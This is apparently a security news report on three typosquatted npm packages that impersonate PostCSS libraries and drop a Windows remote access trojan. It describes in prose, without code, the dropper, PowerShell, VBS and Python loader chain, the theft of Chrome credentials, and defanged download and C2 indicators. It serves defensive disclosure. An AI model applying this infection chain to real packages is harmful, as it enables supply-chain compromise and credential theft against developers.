Recent investigations have uncovered a series of malicious npm packages designed to deploy a Windows-based remote access trojan (RAT). These packages, namely aes-decode-runner-pro, postcss-minify-selector, and postcss-minify-selector-parser, have collectively amassed over 1,000 downloads. They were published over the past month by an npm user identified as “abdrizak” and remain available for download.
These packages impersonate legitimate PostCSS tools to deceive developers. For instance, postcss-minify-selector-parser mimics the widely used postcss-selector-parser library, which boasts over 127 million weekly downloads. Despite their benign appearance, installing any of these packages initiates a multi-stage attack leading to the deployment of the same Windows malware.
The attack sequence begins with a JavaScript dropper embedded within the package. Upon execution, this dropper writes a PowerShell script named settings.ps1 to the disk and runs it. The PowerShell script then downloads a ZIP archive from an external server (nvidiadriver[.]net) using curl.exe. This archive contains several components: a Visual Basic Script (update.vbs), a Python runtime, a Python loader script (loader.py), and multiple Python extension modules compiled with Nuitka.
The Visual Basic Script sets up the Python environment on the compromised system and executes the loader.py script, which activates the core functionality of the RAT. This malware is capable of gathering host information, extracting credentials from Google Chrome, collecting data from Chrome extensions, executing shell commands, and transferring files to and from a command-and-control (C2) server located at 95.216.92[.]207:8080.
The RAT’s capabilities are facilitated by several Python native extension modules:
config.pyd: Contains constants, command IDs, C2 URLs, and registry key names.api.pyd: Manages HTTP C2 packet exchanges.audiodriver.pyd: Oversees the main RAT orchestration loop.command.pyd: Profiles the host, performs virtual machine checks, handles file transfers, and executes shell commands.auto.pyd: Extracts Chrome credentials and extension data, bypassing app-bound encryption protections.util.pyd: Functions as a helper for tar/gzip archives.
This incident underscores the growing trend of attackers leveraging seemingly innocuous packages to infiltrate systems. By disguising malicious code within packages that appear related to legitimate tools with substantial usage, attackers can exploit the trust developers place in these resources. It serves as a stark reminder for developers to exercise caution when incorporating new packages into their projects, especially those that closely resemble popular libraries.
In the broader context, this discovery aligns with other recent campaigns targeting the npm and TypeScript ecosystems. For example, a malicious package named apintergrationpost was found to deliver a full-featured Linux RAT called MYRA, while another package, @withgoogle/stitch-sdk, impersonated Google’s SDK to distribute malware. These incidents highlight the persistent threats within the software supply chain and the need for vigilant security practices.
As the software development community continues to rely heavily on open-source packages, the importance of thorough vetting and monitoring of dependencies cannot be overstated. Implementing automated tools to detect anomalies, maintaining an updated list of trusted packages, and staying informed about emerging threats are crucial steps in safeguarding development environments against such sophisticated attacks.
